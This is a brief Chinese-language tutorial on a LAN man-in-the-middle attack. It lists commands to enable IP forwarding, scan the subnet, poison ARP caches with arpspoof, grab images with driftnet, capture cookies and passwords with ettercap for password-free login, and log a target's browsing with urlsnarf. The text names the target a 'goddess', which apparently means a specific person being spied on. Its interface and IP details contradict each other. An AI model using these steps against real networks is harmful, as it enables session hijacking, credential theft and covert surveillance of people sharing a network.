网络嗅探攻击:arpspoof+driftnet+ ARP

首先开启ip转发

1.设置允许设备通过自己网卡联网

echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

获取网关及局域网机器信息

netstat -rn(注意网关要与设备名相符)

扫描内网机器

nmap -sP 192.168.101.0/24

扫描内外机器端口

nmap -PS 192.168.101.0/24

arp欺骗

arpspoof -i eth0 -t 192.168.101.1 192.168.101.106

获取图片

driftnet -i eth0

注:wlan0为我的电脑网卡,192.168.1.4为目标ip,192.168.1.1为网关。

获取cookie西悉尼

ettercap也可以获取cookie,导入谷歌浏览器即可免密码进入网页
在虚拟机中开启 ARP 欺骗,并输入命令 ettercap -Tq -i eth0 监测密码和账号

获取url信息

7 ,输入urlsnarf -i wlan0 监听女神浏览过的网页日志,等待获取
urlsnarf -i eth0

抓包嗅探

再打开一个终端,输入wireshark ,进行抓包